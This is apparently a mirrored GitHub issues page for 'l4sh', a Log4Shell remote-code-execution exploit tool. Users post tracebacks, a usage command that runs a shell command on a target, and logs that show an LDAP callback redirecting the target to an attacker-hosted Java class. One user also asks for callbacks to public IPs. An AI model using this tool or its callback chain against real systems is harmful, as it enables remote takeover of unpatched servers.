cyberstruggle / l4sh Goto Github PK

Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Java 2.06% Python 97.94%

l4sh's Issues

hi i just get some errors

File "main.py", line 243, in
main()
File "main.py", line 240, in main
get_a_life(target_options)
File "main.py", line 199, in get_a_life
spray_headers(target_options,command,args)
File "main.py", line 128, in spray_headers
go_clutch(url=url,method=request_method,data=None,headers=additionalrequest_headers)
File "main.py", line 50, in go_clutch
request_data.update(data)

can't reproduce

Having used #2 I still can't see file creation:

The exploit seems to have been applied:

python3 main.py -i 172.17.0.1 -u http://172.17.0.3:8080 -c "touch foobar" -p9999  


    ██╗      ██████╗  ██████╗ ██╗  ██╗███████╗██╗  ██╗███████╗██╗     ██╗     
    ██║     ██╔═══██╗██╔════╝ ██║  ██║██╔════╝██║  ██║██╔════╝██║     ██║     
    ██║     ██║   ██║██║  ███╗███████║███████╗███████║█████╗  ██║     ██║     
    ██║     ██║   ██║██║   ██║╚════██║╚════██║██╔══██║██╔══╝  ██║     ██║     
    ███████╗╚██████╔╝╚██████╔╝     ██║███████║██║  ██║███████╗███████╗███████╗
    ╚══════╝ ╚═════╝  ╚═════╝      ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝
                                                                            
        Log4Shell Exploit (Cyber Struggle Delta Group) via @safe_buffer


[*] Started http server on 9999
[*] Started LDAP server on 1389
[*] Spraying 81 known HTTP Header
okeeje
[+] LDAP Callback sending [('javaClassName', ['Main']), ('objectClass', ['javaNamingReference']), ('javaCodeBase', ['http://172.17.0.1:9999/']), ('javaFactory', ['Main'])]
[+] Redirecting to http://172.17.0.1:9999/Main touch foobar
 New HTTP Request 200  
[+] Sent the final payload your command has been executed right now
okeeje
[+] LDAP Callback sending [('javaClassName', ['Main']), ('objectClass', ['javaNamingReference']), ('javaCodeBase', ['http://172.17.0.1:9999/']), ('javaFactory', ['Main'])]
[+] Redirecting to http://172.17.0.1:9999/Main touch foobar

And in the 'vulnerable-app' container;

2021-12-15 22:07:41.325  INFO 1 --- [nio-8080-exec-5] HelloWorld                               : Received a request for API version Log4Shell-CS Reference Class Name: Main

But I can't see any file foobar in the container:

docker exec -ti vulnerable-app sh
/ # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4676561178698547045  tomcat.8080.7851898943690850285
/ #

Doesn't work with a host's public NAT IP

The exploit currently only works if the target can reach the exploiting host's private IP. The exploit needs an option to allow callbacks to a public IP or DNS name that resolves back to a public IP that NATs back to the private IP.

got some errors..

[] Started http server on 9999
[] Started LDAP server on 1389
[*] Spraying 81 known HTTP Header
Traceback (most recent call last):
File "main.py", line 243, in
main()
File "main.py", line 240, in main
get_a_life(target_options)
File "main.py", line 199, in get_a_life
spray_headers(target_options,command,args)
File "main.py", line 128, in spray_headers
go_clutch(url=url,method=request_method,data=None,headers=additionalrequest_headers)
File "main.py", line 51, in go_clutch
request_data.update(data)
TypeError: 'NoneType' object is not iterable

What's the problem ? :/

can't reproduce

I can't reproduce it, what's the vulnerable docker container that you used?

cyberstruggle / l4sh Goto Github PK

l4sh's Issues

hi i just get some errors

can't reproduce

Doesn't work with a host's public NAT IP

got some errors..

can't reproduce

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent